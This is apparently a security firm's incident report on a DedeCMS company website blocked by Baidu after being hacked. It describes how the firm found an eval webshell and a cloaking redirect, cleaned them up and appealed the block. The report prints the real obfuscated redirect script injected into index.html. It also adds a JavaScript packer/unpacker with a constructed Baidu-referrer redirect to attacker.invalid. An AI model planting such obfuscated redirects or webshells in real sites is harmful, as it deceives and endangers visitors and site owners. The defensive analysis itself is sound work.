2025-03-31 Update From: SLTechnology News&Howtos (Network Security)
Shulou(Shulou.com)06/01 Report--
Near the end of 2019, a customer's company website was flagged and blocked by Baidu URL Security Center. The site could no longer be opened from Baidu at all, and the impact on the business was large. Through a friend's introduction the customer came to us at SINE Security for help in getting the block lifted. Below we share how we handled it and how the Baidu security interception warning was removed, in the hope that it is useful to others.
Incident recap: in early December, the customer had just got home from work when his manager called to say the website could not be opened from Baidu. He immediately opened the site on his phone and it loaded normally. He then searched Baidu for the company domain and found that Baidu URL Security Center had blocked it with the warning: "Illegal web page, closing it is recommended. You are visiting: //company domain. This page may be illegal and contain illegal information and unhealthy content. Please visit with caution." As shown in the figure below:
The whole of the customer's site was unreachable from Baidu. Baidu does not flag a site without a reason, so our SINE Security engineers started by searching Baidu for the domain. The search result itself was annotated: "Baidu URL Security Center reminds you: this site may have been attacked by hackers and some pages have been illegally tampered with!" The following figure shows it:
Clicking through produced Baidu's interception page: the site may have been attacked by hackers, some pages have been illegally tampered with and may threaten your property and information security; visit with caution. We have handled many sites in exactly this situation, so the first step was to query Baidu URL Security Center (https://bsb.baidu.com/) for the cause. Entering the customer's URL returned a "dangerous" rating with the note that the site's pages contain malicious information.
So Baidu had detected malicious content on the site, but it does not say on which page. Baidu also offers a free Baidu Cloud Observation product; we registered and ran its security check, which found nothing. Where was the malicious content, and how do you find it? In our years of experience, Baidu's tools, e-mail and complaint channels never give you the specific offending link; you only get an official reply. You have to find the root cause in the code yourself, starting from what Baidu has indexed for the company's site.
That is where the problem showed: the content in Baidu's cached snapshot of the site had been replaced with adult-content (pornography and prostitution) spam. Knowing the site contained malicious information, we started from the code. The customer's site runs the open-source DedeCMS on PHP and MySQL. We compressed a copy on the server, downloaded it and went through the source line by line, comparing it with the customer's earlier backup of the site. The comparison showed that search.php under the plus directory had been tampered with: an eval-based one-line Trojan, that is, a webshell, had been added.
The home page file index.html had also been modified: code was added and, in particular, the title and description had been changed, so that a visitor arriving from a Baidu search result was automatically redirected to the adult site. The index.html tampering is the script below; the packed payload string and its dictionary appear exactly as printed in this report:
eval(function(p,a,c,k,e,d){e=function(c){return(c>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}
('l["\\k\\a\\1\\m\\9\\7\\o\\0"]["\\n\\4\\8\\0\\7"](\\e\\2\\1\\4\\8\\5\\0\\I\\5\\7\\c\\6\\0\\7\\j\\0\\3\\f\\b\\u\\b\\2\\1\\4\\8\\5\\0\\6\\3\\c\\6\\t\\0\\0\\5\\w\\3\\3\\v\\Q\\p\\s\\r\\h\\1\\a\\9\\3\\g\\g\\h\\f\\2\\6\\d\\E\\3\\2\\1\\4\\8\\5\\0\\d)',
33,33,'x74|x63|x73|x2f|x72|x70|x65|x69|x6d|x6f|x61|x3d|x3e|x3c|x6a|x31|x2e|x79|x78|x64|window|x75|x77|x6e|x38|x37|x71|x7a|x68|x76|x35|x3a'.split('|'),0,{}))
What this injected script does: the eval(function(p,a,c,k,e,d){...}) wrapper is the common JavaScript "packer"; it rebuilds the real code by substituting the base-36 tokens in the first string with the words in the dictionary at the end. That dictionary is the tell. x74, x63, x73, x2f, x72, x70 and the rest are the \x escapes for t, c, s, /, r, p and so on, so the unpacked code spells out a window["document"]["write"] of a <script src="http://..."> tag that loads a file from the attacker's domain (the domain itself is not legible in the packed text above). The script that tag loads checks whether the visitor arrived from a Baidu click and, if so, redirects to the domain the attacker set. A visitor who types the site's URL directly is not redirected, which is why the customer's own check on his phone showed the site as "normal". Without some familiarity with obfuscated JavaScript the code is unreadable, which is the point.

Having found the cause, we cleaned up: removed the malicious code from the home page and restored normal access, deleted the webshell backdoor file the attacker had left behind, and ran a full security assessment of the customer's site code, including vulnerability scanning. This showed that the site ran an early version of DedeCMS with a remote code execution vulnerability and an upload function that accepted arbitrary file types. We fixed these in the code, added filtering and a whitelist of permitted upload extensions, and hardened the upload directory so that PHP scripts can be neither written to it nor executed from it, followed by overall hardening of the site to stop the attacker tampering with it again.

Some site owners think that deleting the malicious code on the home page is the whole fix. That is a serious mistake. The root cause is not the injected code but the vulnerabilities that let it in; deleting the code alone is mending the fold after the sheep are gone, and the vulnerabilities have to be repaired at the root. This also matters for getting the Baidu block lifted for good: Baidu re-checks flagged sites periodically, and a site that is found tampered with repeatedly is blacklisted and blocked for a long time.
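To show how a snippet like the one above can be read without executing it, here is an added example in JavaScript (my own code, not from this report or from SINE Security): a packer that emits the same eval(function(p,a,c,k,e,d){...}) form, a static unpacker that reverses it and the \xNN escapes with a regex instead of eval, and a classifier for the cloaking behaviour just described. SAMPLE_PAYLOAD, its Baidu-referrer gate and the host attacker.invalid are constructed for the demonstration and are not the payload from the customer's site, which only loaded a remote script.

```javascript
// Added example (not the page's or SINE Security's code): pack/unpack for the
// eval(function(p,a,c,k,e,d){...}) obfuscation used in the tampered index.html, a
// static decoder that never calls eval, and a classifier for cloaking behaviour.
// SAMPLE_PAYLOAD and attacker.invalid are constructed for the demo.

// The boilerplate the obfuscator emits in front of its arguments (the standard
// "packer" wrapper), kept verbatim so decodePackedCall() sees realistic input.
const PACKER_WRAPPER = String.raw`eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}(`;

// Dictionary index c written in base a: 0-9a-z, and 36+ as A-Z via fromCharCode(c+29),
// exactly what the wrapper's e() computes.
function encodeIndex(c, a) {
  return (c < a ? '' : encodeIndex(Math.floor(c / a), a)) +
    ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36));
}

// Replace every \w+ token with its dictionary key. A word equal to its own key is
// stored as '' (the wrapper's k[c]||e(c) restores it).
function pack(source, a = 36) {
  const words = [];
  const index = new Map();
  const p = source.replace(/\w+/g, (w) => {
    if (!index.has(w)) { index.set(w, words.length); words.push(w); }
    return encodeIndex(index.get(w), a);
  });
  const k = words.map((w, i) => (w === encodeIndex(i, a) ? '' : w));
  return { p, a, k };
}

// The full eval(...) call as it would be pasted into a page.
function packCall(source) {
  const { p, a, k } = pack(source);
  const quote = (s) => "'" + s.replace(/\\/g, '\\\\').replace(/'/g, "\\'") + "'";
  return `${PACKER_WRAPPER}${quote(p)},${a},${k.length},${quote(k.join('|'))}.split('|'),0,{}))`;
}

// Static reversal: rebuild the key->word table and substitute the tokens back.
function unpack(p, a, k) {
  const d = Object.create(null);
  for (let c = k.length; c--;) d[encodeIndex(c, a)] = k[c] || encodeIndex(c, a);
  return p.replace(/\b\w+\b/g, (t) => (t in d ? d[t] : t));
}

// Pull p, a and k out of the eval(...) text with a regex; nothing is executed.
function decodePackedCall(src) {
  const m = /\}\s*\(\s*'((?:[^'\\]|\\[\s\S])*)'\s*,\s*(\d+)\s*,\s*\d+\s*,\s*'((?:[^'\\]|\\[\s\S])*)'\.split\('\|'\)/.exec(src);
  if (!m) throw new Error('not an eval(function(p,a,c,k,e,d){...})(...) call');
  const unquote = (s) => s.replace(/\\([\s\S])/g, '$1');
  return unpack(unquote(m[1]), Number(m[2]), unquote(m[3]).split('|'));
}

// Second layer used on the customer's site: "\x64\x6f..." escapes hiding names such
// as document and write from a plain grep.
function decodeHexEscapes(js) {
  return js.replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

function deobfuscate(src) {
  return decodeHexEscapes(decodePackedCall(src));
}

// Indicators of the behaviour described in the article: a referrer gate on Baidu, a
// redirect, or injection of a remote script that does the gating.
function classify(js) {
  return {
    referrerCheck: /\breferrer\b/.test(js),
    baiduGate: /baidu/i.test(js),
    redirect: /\blocation\s*(?:\.href)?\s*=[^=]|\blocation\s*\.\s*(?:replace|assign)\s*\(/.test(js),
    remoteScript: /<script[^>]*\bsrc\s*=/i.test(js) || /\bdocument\b[^;]*\bwrite\b/i.test(js),
  };
}

// Constructed sample in the same style as the real one: hex-escaped property name,
// referrer gate on Baidu, redirect to the attacker's host.
const SAMPLE_PAYLOAD =
  'if(/baidu\\.com/i.test(window["\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74"].referrer))' +
  '{window.location.href="http://attacker.invalid/"}';

if (typeof require !== 'undefined' && require.main === module) {
  const packed = packCall(SAMPLE_PAYLOAD);
  console.log(packed);
  const js = deobfuscate(packed);
  console.log(js);
  console.log(classify(js));
}
```

Run it with node and paste a packed blob from a tampered page into decodePackedCall() instead of the sample; the decoded text is a string to read, never something to eval. When the decoded code only writes a <script src="..."> tag, as on the customer's site, fetch that remote file separately (from a machine that is not the victim server, with a non-Baidu referrer and a Baidu referrer) and run it through the same classifier, because that is where the referrer check and the redirect live.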
With the site secured and all malicious content and code removed, we filed an appeal through Baidu URL Security Center and waited for Baidu's manual review. On the third day after the appeal, a Baidu URL Security Center technician replied: "Hello, the check result for the domain https:// [website] is: passed review." The Baidu URL Security Center block was lifted completely and the customer's company site was back to normal access. We keep the customer's loss to a minimum and treat the customer's problems as our own; that is how our road gets wider.